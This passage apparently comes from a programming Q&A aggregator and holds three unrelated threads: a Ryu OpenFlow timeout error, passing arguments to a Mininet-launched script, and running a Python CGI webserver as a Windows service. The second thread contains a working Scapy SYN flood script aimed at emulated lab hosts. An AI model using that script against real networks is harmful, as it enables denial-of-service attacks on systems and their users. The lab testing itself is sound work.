else:
self.security_alert = False
match = parser.OFPMatch(in_port=in_port, eth_dst=dst, eth_src=src)
# verify if we have a valid buffer_id, if yes avoid to send both
# flow_mod & packet_out
if self.security_alert == False:
if msg.buffer_id != ofproto.OFP_NO_BUFFER:
self.add_flow(datapath, 1, match, actions, msg.buffer_id)
return
else:
self.add_flow(datapath, 1, match, actions)
elif self.security_alert == True:
if msg.buffer_id != ofproto.OFP_NO_BUFFER:
self.add_security_flow(datapath, 1, match, actions, msg.buffer_id)
return
else:
self.add_security_flow(datapath, 1, match, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
if self.security_alert == False:
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
datapath.send_msg(out)
The above error appears at the end of the add_security_flow() method, when I make a TCP connection that is identified as a known attacker and the method tries to send the flow modification (datapath.send_msg(mod)) to the switch/datapath.
What am I doing wrong? Am I missing some sort of variable?
On the Ryu controller mailing list a user named IWAMOTO told me that my hard_timeout value was too large for the struct packing (2 hours is 7200 seconds; I don't know where my head was when I came up with 432000). After downsizing the hard_timeout to 7200 seconds everything worked out just fine.
Always check the size of the values you're trying to send to a datapath and make sure they don't exceed 65535.
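For reference, below is a minimal sketch of the corrected add_security_flow(); the only change from the code above is keeping hard_timeout inside the unsigned 16-bit range that OFPFlowMod's fields are packed into (7200 s matches the intended 2-hour block), plus a defensive clamp.

# Sketch of the fix: OpenFlow packs hard_timeout as an unsigned 16-bit
# field ('H'), so the value must be <= 65535; 7200 s = 2 hours.
SECURITY_TIMEOUT = 7200

def add_security_flow(self, datapath, priority, match, actions, buffer_id=None):
    ofproto = datapath.ofproto
    parser = datapath.ofproto_parser
    inst = [parser.OFPInstructionActions(ofproto.OFPIT_CLEAR_ACTIONS, [])]
    timeout = min(SECURITY_TIMEOUT, 65535)  # guard against oversized values
    if buffer_id:
        mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
                                priority=priority, match=match,
                                command=ofproto.OFPFC_ADD,
                                instructions=inst, hard_timeout=timeout)
    else:
        mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
                                match=match, command=ofproto.OFPFC_ADD,
                                instructions=inst, hard_timeout=timeout)
    datapath.send_msg(mod)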

Run a python script in Command Line and send argument to it

I used the following Python script to create a custom topology in Mininet, run with sudo python My_topology.py:
from mininet.topo import Topo
from mininet.node import Node
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.node import RemoteController
import logging
import os
import sys

logging.getLogger().setLevel(logging.INFO)

host_list = []  # host names, filled in by MyTopo

class MyTopo(Topo):
    def __init__(self, ipBase='10.0.0.0/8'):
        Topo.__init__(self)
        global host_list
        # Add hosts and switches
        s1 = self.addSwitch('s1')
        for i in range(1, 21):
            self.addHost('h%s' % i)
            host_list.append('h%s' % i)
            self.addLink('h%s' % i, s1)

def attack():
    h1 = net.get('h1')
    h1.cmd('sudo python .../My_SYNflood_attack.py')

topo = MyTopo()
net = Mininet(topo, controller=lambda name: RemoteController(name,
              ip='127.0.0.1', protocol='tcp', port=6633), autoSetMacs=True)
net.start()
attack()
CLI(net)
net.stop()
As you can see, in the attack function I call another .py script to send TCP packets from host h1 to another host. My_SYNflood_attack.py is as follows:
from scapy.all import *
import os
import sys
import random
import argparse

srcIP = '10.0.0.1'
dstIP = '10.0.0.10'
srcPort = 5555
dstPort = 4444

def randInt():
    x = random.randint(1000, 9000)
    return x

def SYN_Flood(srcIP, dstIP, dstPort, counter):
    total = 0
    print("Packets are sending ...")
    for x in range(0, counter):
        s_port = randInt()
        s_eq = randInt()
        w_indow = randInt()
        IP_Packet = IP()
        IP_Packet.src = srcIP
        IP_Packet.dst = dstIP
        TCP_Packet = TCP()
        TCP_Packet.sport = s_port
        TCP_Packet.dport = dstPort
        TCP_Packet.flags = "S"
        TCP_Packet.seq = s_eq
        TCP_Packet.window = w_indow
        send(IP_Packet/TCP_Packet, verbose=0)
        total += 1
    sys.stdout.write("\nTotal packets sent: %i\n" % total)

def main():
    SYN_Flood(srcIP, dstIP, dstPort, 10)  # 10 is the number of packets

if __name__ == "__main__":
    main()
As you can see, in the second script I set the source and destination IP addresses statically. Now I want to pass the source and destination IP addresses from the first script and call My_SYNflood_attack.py in the attack function like this: h1.cmd('sudo python .../My_SYNflood_attack.py 10.0.0.2 10.0.0.3')
How can I do it?
Are you looking for something like this?
def attack():
    h1 = net.get('h1')
    h1.cmd('sudo python .../My_SYNflood_attack.py 10.0.0.2 10.0.0.3')
and:
srcIP = sys.argv[1]
dstIP = sys.argv[2]
Alternatively, you can call another Python script with arguments using subprocess:
subprocess.call(['python', '.../My_SYNflood_attack.py', somescript_arg1, somescript_val1, ...])
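Since My_SYNflood_attack.py already imports argparse, a slightly more robust version of the same idea is to parse named positional arguments instead of indexing sys.argv. This is only a sketch; it reuses SYN_Flood and dstPort from the script above, and the --count option is an invented extra.

# Sketch: replace the static IPs in My_SYNflood_attack.py with CLI arguments.
import argparse

def parse_args():
    parser = argparse.ArgumentParser(description="Send a small SYN flood")
    parser.add_argument("src_ip", help="source IP address, e.g. 10.0.0.2")
    parser.add_argument("dst_ip", help="destination IP address, e.g. 10.0.0.3")
    parser.add_argument("--count", type=int, default=10,
                        help="number of packets to send")
    return parser.parse_args()

def main():
    args = parse_args()
    SYN_Flood(args.src_ip, args.dst_ip, dstPort, args.count)

if __name__ == "__main__":
    main()

The Mininet call from attack() then stays h1.cmd('sudo python .../My_SYNflood_attack.py 10.0.0.2 10.0.0.3').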

Run python Webserver as Windows service

I have server and console scripts which keep listening on a port for console and server requests.
In a UNIX environment I made both the server and the console script continuously running daemons, which keeps them listening on their ports.
Is there any way in Windows to keep them running like daemons in UNIX? I also want them to come up on reboot (they should be auto-started on reboot).
I read about Windows services and followed the code written here, but I am getting a 404 error on my webpage:
__version__ = "0.4"
__all__ = ["RequestHandler"]
import atexit
import BaseHTTPServer
import CGIHTTPServer
import copy
import os
import select
import SimpleHTTPServer
import sys
import time
import threading
import urllib
from signal import SIGTERM
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
pass
class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
have_fork = hasattr(os, 'fork')
have_popen2 = hasattr(os, 'popen2')
have_popen3 = hasattr(os, 'popen3')
rbufsize = 0
def do_POST(self):
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, "Can only POST to CGI scripts")
def send_head(self):
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
def is_cgi(self):
splitpath = _url_collapse_path_split(self.path)
if splitpath[0] in self.cgi_directories:
self.cgi_info = splitpath
return True
return False
cgi_directories = ['/cgi-bin', '/htbin']
def is_executable(self, path):
return executable(path)
def is_python(self, path):
head, tail = os.path.splitext(path)
return tail.lower() in (".py", ".pyw")
def run_cgi(self):
path = self.path
dir, rest = self.cgi_info
i = path.find('/', len(dir) + 1)
while i >= 0:
nextdir = path[:i]
nextrest = path[i+1:]
scriptdir = self.translate_path(nextdir)
if os.path.isdir(scriptdir):
dir, rest = nextdir, nextrest
i = path.find('/', len(dir) + 1)
else:
break
i = rest.rfind('?')
if i >= 0:
rest, query = rest[:i], rest[i+1:]
else:
query = ''
i = rest.find('/')
if i >= 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''
scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%r)" % scriptname)
return
if not os.path.isfile(scriptfile):
self.send_error(403, "CGI script is not a plain file (%r)" %
scriptname)
return
ispy = self.is_python(scriptname)
if not ispy:
if not (self.have_fork or self.have_popen2 or self.have_popen3):
self.send_error(403, "CGI script is not a Python script (%r)" %
scriptname)
return
if not self.is_executable(scriptfile):
self.send_error(403, "CGI script is not executable (%r)" %
scriptname)
return
# Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
# XXX Much of the following could be prepared ahead of time!
env = {}
env['SERVER_SOFTWARE'] = self.version_string()
env['SERVER_NAME'] = self.server.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PROTOCOL'] = self.protocol_version
env['SERVER_PORT'] = str(self.server.server_port)
env['REQUEST_METHOD'] = self.command
uqrest = urllib.unquote(rest)
env['PATH_INFO'] = uqrest
env['PATH_TRANSLATED'] = self.translate_path(uqrest)
env['SCRIPT_NAME'] = scriptname
if query:
env['QUERY_STRING'] = query
host = self.address_string()
if host != self.client_address[0]:
env['REMOTE_HOST'] = host
env['REMOTE_ADDR'] = self.client_address[0]
authorization = self.headers.getheader("authorization")
if authorization:
authorization = authorization.split()
if len(authorization) == 2:
import base64, binascii
env['AUTH_TYPE'] = authorization[0]
if authorization[0].lower() == "basic":
try:
authorization = base64.decodestring(authorization[1])
except binascii.Error:
pass
else:
authorization = authorization.split(':')
if len(authorization) == 2:
env['REMOTE_USER'] = authorization[0]
# XXX REMOTE_IDENT
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
referer = self.headers.getheader('referer')
if referer:
env['HTTP_REFERER'] = referer
accept = []
for line in self.headers.getallmatchingheaders('accept'):
if line[:1] in "\t\n\r ":
accept.append(line.strip())
else:
accept = accept + line[7:].split(',')
env['HTTP_ACCEPT'] = ','.join(accept)
ua = self.headers.getheader('user-agent')
if ua:
env['HTTP_USER_AGENT'] = ua
co = filter(None, self.headers.getheaders('cookie'))
if co:
env['HTTP_COOKIE'] = ', '.join(co)
# XXX Other HTTP_* headers
# Since we're setting the env in the parent, provide empty
# values to override previously set values
for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
'HTTP_USER_AGENT', 'HTTP_COOKIE', 'HTTP_REFERER'):
env.setdefault(k, "")
os.environ.update(env)
self.send_response(200, "Script output follows")
decoded_query = query.replace('+', ' ')
if self.have_fork:
# Unix -- fork as we should
args = [script]
if '=' not in decoded_query:
args.append(decoded_query)
nobody = nobody_uid()
self.wfile.flush() # Always flush before forking
pid = os.fork()
if pid != 0:
# Parent
pid, sts = os.waitpid(pid, 0)
# throw away additional data [see bug #427345]
while select.select([self.rfile], [], [], 0)[0]:
if not self.rfile.read(1):
break
if sts:
self.log_error("CGI script exit status %#x", sts)
return
# Child
try:
try:
os.setuid(nobody)
except os.error:
pass
os.dup2(self.rfile.fileno(), 0)
os.dup2(self.wfile.fileno(), 1)
os.execve(scriptfile, args, os.environ)
except:
self.server.handle_error(self.request, self.client_address)
os._exit(127)
else:
# Non Unix - use subprocess
import subprocess
cmdline = [scriptfile]
if self.is_python(scriptfile):
interp = sys.executable
if interp.lower().endswith("w.exe"):
# On Windows, use python.exe, not pythonw.exe
interp = interp[:-5] + interp[-4:]
cmdline = [interp, '-u'] + cmdline
if '=' not in query:
cmdline.append(query)
self.log_message("command: %s", subprocess.list2cmdline(cmdline))
try:
nbytes = int(length)
except (TypeError, ValueError):
nbytes = 0
p = subprocess.Popen(cmdline,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE
)
if self.command.lower() == "post" and nbytes > 0:
data = self.rfile.read(nbytes)
else:
data = None
# throw away additional data [see bug #427345]
while select.select([self.rfile._sock], [], [], 0)[0]:
if not self.rfile._sock.recv(1):
break
stdout, stderr = p.communicate(data)
self.wfile.write(stdout)
if stderr:
self.log_error('%s', stderr)
status = p.returncode
if status:
self.log_error("CGI script exit status %#x", status)
else:
self.log_message("CGI script exited OK")
def _url_collapse_path_split(path):
path_parts = []
for part in path.split('/'):
if part == '.':
path_parts.append('')
else:
path_parts.append(part)
# Filter out blank non trailing parts before consuming the '..'.
path_parts = [part for part in path_parts[:-1] if part] + path_parts[-1:]
if path_parts:
tail_part = path_parts.pop()
else:
tail_part = ''
head_parts = []
for part in path_parts:
if part == '..':
head_parts.pop()
else:
head_parts.append(part)
if tail_part and tail_part == '..':
head_parts.pop()
tail_part = ''
return ('/' + '/'.join(head_parts), tail_part)
nobody = None
def nobody_uid():
"""Internal routine to get nobody's uid"""
global nobody
if nobody:
return nobody
try:
import pwd
except ImportError:
return -1
try:
nobody = pwd.getpwnam('nobody')[2]
except KeyError:
nobody = 1 + max(map(lambda x: x[2], pwd.getpwall()))
return nobody
def executable(path):
"""Test for executable file."""
try:
st = os.stat(path)
except os.error:
return False
return st.st_mode & 0111 != 0
Handler = RequestHandler
PORT = 7998
ADDRESS = "0.0.0.0"
httpd = ThreadedHTTPServer((ADDRESS, PORT), Handler)
print "serving at %s:%s" % (ADDRESS, PORT)
import os
import SocketServer
import BaseHTTPServer
import SimpleHTTPServer
import xmlrpclib
import SimpleXMLRPCServer
import socket
import httplib
import inspect
import win32service
import win32serviceutil
import win32api
import win32con
import win32event
import win32evtlogutil
class XMLRPCServerService(win32serviceutil.ServiceFramework):
_svc_name_ = "XMLRPCServerService"
_svc_display_name_ = "XMLRPCServerService"
_svc_description_ = "Tests Python service framework by receiving and echoing messages over a named pipe"
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
win32event.SetEvent(self.hWaitStop)
def SvcDoRun(self):
import servicemanager
servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,servicemanager.PYS_SERVICE_STARTED,(self._svc_name_, ''))
self.timeout = 100
while 1:
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
if rc == win32event.WAIT_OBJECT_0:
servicemanager.LogInfoMsg("XMLRPCServerService - STOPPED")
break
else:
httpd.serve_forever()
servicemanager.LogInfoMsg("XMLRPCServerService - is alive and well")
def ctrlHandler(ctrlType):
return True
if __name__ == '__main__':
win32api.SetConsoleCtrlHandler(ctrlHandler, True)
win32serviceutil.HandleCommandLine(XMLRPCServerService)
Any clues where I am going wrong? Or a good way to implement it (maybe without using a service)?
Strict note:
The solution must be in Python 2.6 (project requirement).
Updates:
I saw something weird in the log of python service.py debug:
127.0.0.1 - - [04/Apr/2014 09:41:04] command: C:\Python27\Lib\site-packages\win32\pythonservice.exe -u C:\CONSOLE-CGI\cgi-bin\login.py ""
Why is the CGI script being executed with pythonservice.exe?
What am I missing here?
More updates:
Code snippet from the daemon process Python script:
# Non Unix - use subprocess
import subprocess
cmdline = [scriptfile]
if self.is_python(scriptfile):
    # interp = sys.executable  # here it returns pythonservice.exe
    interp = "python.exe"  # if I hardcode it to python.exe, all goes fine
    if interp.lower().endswith("w.exe"):
        # On Windows, use python.exe, not pythonw.exe
        interp = interp[:-5] + interp[-4:]
    cmdline = [interp, '-u'] + cmdline
Any clues why this is so?
You may need to redirect all the output, since the Windows scheduler has some issues with this in the pythonw case. The process does start properly, but without redirecting stdout and stderr no action gets done and the server does not respond.
import http.server
import socketserver
import sys

PORT = 1234
Handler = http.server.SimpleHTTPRequestHandler

if __name__ == '__main__':
    sys.stdout = open('out.txt', 'w')
    sys.stderr = open('err.txt', 'w')
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        print("serving at port %d" % PORT, flush=True)
        httpd.serve_forever()
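Since the question is pinned to Python 2.6, roughly the same redirect idea in Python 2 syntax might look like the sketch below (untested; SimpleHTTPRequestHandler stands in for the CGI handler from the question).

# Sketch: Python 2 variant of the stdout/stderr redirection shown above.
import SimpleHTTPServer
import SocketServer
import sys

PORT = 1234
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

if __name__ == '__main__':
    # Redirect output so a service/scheduler context does not hang on a console.
    sys.stdout = open('out.txt', 'w')
    sys.stderr = open('err.txt', 'w')
    httpd = SocketServer.TCPServer(("", PORT), Handler)
    print >> sys.stdout, "serving at port %d" % PORT
    sys.stdout.flush()
    httpd.serve_forever()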
